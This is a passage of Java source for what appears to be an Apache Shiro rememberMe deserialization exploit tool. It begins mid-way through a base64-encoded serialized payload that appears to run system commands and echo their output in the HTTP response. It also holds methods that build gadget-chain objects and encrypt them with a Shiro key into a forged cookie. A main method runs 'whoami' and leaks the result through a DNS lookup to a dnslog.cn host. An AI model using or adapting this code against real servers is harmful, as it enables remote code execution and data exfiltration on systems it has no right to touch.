XZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBAAtnZXRSZXNwb25zZQEAKigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAPZ2V0T3V0cHV0U3RyZWFtAQAlKClMamF2YXgvc2VydmxldC9TZXJ2bGV0T3V0cHV0U3RyZWFtOwEAGShMamF2YS9pby9PdXRwdXRTdHJlYW07KVYBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAFY2xvc2UBAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBAAZsZW5ndGgBAAMoKUkBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEABChJKVYBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCZCgCaAEUAIQAlAJoAAAAAAAIAAQAnACgAAgApAAABRQAFAAcAAACbKrcAm7gAAsAAA7YABEwrEgW5AAYCAE0SB7gACLYACRIKtgALmQAYBr0ADFkDEg1TWQQSDlNZBSxTpwAVBr0ADFkDEg9TWQQSEFNZBSxTTrsAEVm7ABJZLbcAE7YAFLYAFbcAFhIXtgAYtgAZOgS4AALAAAO2ABo6BbsAG1kZBbkAHAEAtwAdOgYZBhkEtgAeGQa2AB8ZBrYAILEAAAADACoAAAAuAAsAAAAKAAQACwAOAAwAFwANAE8ADgBuAA8AeQAQAIkAEQCQABIAlQATAJoAFAArAAAASAAHAAAAmwAsAC0AAAAOAI0ALgAvAAEAFwCEADAAMQACAE8ATAAyADMAAwBuAC0ANAAxAAQAeQAiADUANgAFAIkAEgA3ADgABgA5AAAAFgAC/wA8AAMHADoHADsHADwAAFEHAD0APgAAAAQAAQA/AAkAQABBAAEAKQAAAEoAAgACAAAADhIhTLIAIiu2ACO2ACSxAAAAAgAqAAAADgADAAAAGAADABkADQAaACsAAAAWAAIAAAAOAEIAMwAAAAMACwA0ADEAAQABAEMAAAACAERwdAABYXB3AQB4cQB+AA54");
            }
        }else{
            Class payloadClass= ObjectPayload.Utils.getPayloadClass(gadget);
            ObjectPayload payload = (ObjectPayload)payloadClass.newInstance();
            Object object = payload.getObject(echo);
            bytes=getBytes(object);
        }

        rememberMe = shiroEncrypt(key,bytes);
        return rememberMe;
    }



    private void onOK() {
        // add your code here
        bool=true;
        dispose();
    }

    private void onCancel() {
        // add your code here if necessary
        bool=false;
        dispose();
    }

    public  String shiroEncrypt(String key, byte[] objectBytes) {
       // Base64 B64 = new Base64();
        byte[] pwd = Base64.decode(key);
        AesCipherService cipherService = new AesCipherService();
        ByteSource byteSource = cipherService.encrypt(objectBytes, pwd);
        byte[] value = byteSource.getBytes();
        return new String(Base64.encode(value));
    }

    public  byte[] getBytes(Object obj) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = null;
        ObjectOutputStream objectOutputStream = null;
        byteArrayOutputStream = new ByteArrayOutputStream();
        objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(obj);
        objectOutputStream.flush();
        return byteArrayOutputStream.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", "whoami"} : new String[]{"/bin/sh", "-c", "whoami"};
        String str = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
        str=str.replace("\n","").replace("\t","");
        new java.net.Socket(str+".1hpb0k.dnslog.cn",80);

}


}
